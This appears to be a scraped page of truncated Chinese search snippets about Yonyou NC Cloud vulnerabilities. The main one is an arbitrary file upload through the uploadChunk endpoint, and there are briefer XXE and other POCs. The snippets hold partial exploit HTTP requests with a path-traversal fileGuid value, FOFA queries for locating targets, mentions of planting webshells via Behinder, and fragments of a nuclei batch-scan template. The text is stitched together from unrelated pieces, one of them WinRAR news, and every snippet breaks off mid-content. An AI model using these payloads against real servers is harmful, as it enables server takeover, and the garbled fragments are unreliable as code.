用友NC Cloud uploadChunk文件存在任意文件上传漏洞,攻击者通过此漏洞可实现上传木马文件,控制服务器。 漏洞影响 未知 复现环境 app="用友-NC-Cloud" 漏洞复现 POC如下: 1POST /ncchr/pm/fb/attachment/uploadChunk?fileGuid=/../../../nccloud/&chunk=1&chunks=1 HTTP/1.12Host:3User-Agent: Mozilla/4.0 ...
用友NC cloud uploadChunk 存在任意文件上传,攻击者可利用此漏洞获取服务器权限。 0x02漏洞复现 1、fofa app='用友-NC-Cloud' 2、部分界面如下 3、复现如下(利用方式请加入帮会获取) 0x03修复建议 1、升级到安全版本2、对上传文件类型进行限制,并且不能只做前端的限制,而要前端和后端一起限制,后端可以进行扩展名...
使用冰蝎进行连接 nuclei批量yaml文件 id:yonyou_NCCloud_uploadChunk_uploadinfo:name:用友NCClouduploadChunk任意文件上传漏洞author:afanseverity:criticaltags:yonyou,changjietong,bjxsec,yonyouoadescription:fofaapp="畅捷通-TPlus"variables:file_name:"{{to_lower(rand_text_alpha(8))}}.txt"file_content:"{{t...
uploadChunk任意文件上传 绕过前台的校验,我们就可以查看后台的是否存在漏洞。 在/ncchr/pm/fb/attachment.java中存在文件上传功能 @RequestMapping定义了一个请求映射,将POST到/uploadChunk路径的请求路径到uploadChunk方法,查看代码,uploadChunk方法实际是处理文件分片上传请求的。接收参数为(HttpServletRequest request, Mul...
name: 用友NC Cloud uploadChunk任意文件上传漏洞 author: afan severity: critical tags: yonyou,changjietong,bjxsec,yonyouoa description: fofa app="畅捷通-TPlus" variables: file_name: "{{to_lower(rand_text_alpha(8))}}.txt" file_content: "{{to_lower(rand_text_alpha(26))}}" requests: - ...
一点一点记录,如有问题可以私信或者评论,不喜勿喷,谢谢大家,欢迎大家批评指正。 shiusec 129671围观·2·22023-10-19 国家支持的 APT 正在利用 WinRAR 漏洞 资讯 一些由政府支持的 APT 正在利用 CVE-2023-38831漏洞,这是 WinRAR 中的一个文件扩展名欺骗漏洞。 Zhuolin 131739围观2023-10-19...
文件上传路径访问 /nccloud/test.txt ## nuclei批量yaml文件 ```yaml id: yonyou_NCCloud_uploadChunk_upload info: name: 用友NC Cloud uploadChunk任意文件上传漏洞 author: afan severity: critical tags: yonyou,changjietong,bjxsec,yonyouoa description: fofa app="畅捷通-TPlus" variables: file_name: "...
漏洞简介 用友NC系统的smartweb2.RPC.d接口存在XML外部实体注入漏洞,攻击者可以利用该漏洞进行文件读取、内网端口扫描等攻击。 漏洞复现 fofa语法:app="用友-UFIDA-NC" 登录页面如下: POC: POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
漏洞复现 fofa语法:app="用友-GRP-RMIS系统" 系统登录页面如下: POC: POST/datalist.jspHTTP/1.1Host:xxxxUser-Agent:python-requests/2.31.0Accept-Encoding:gzip,deflateAccept:*/*Connection:closeContent-Type:application/x-www-form-urlencodedContent-Length:80631=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1...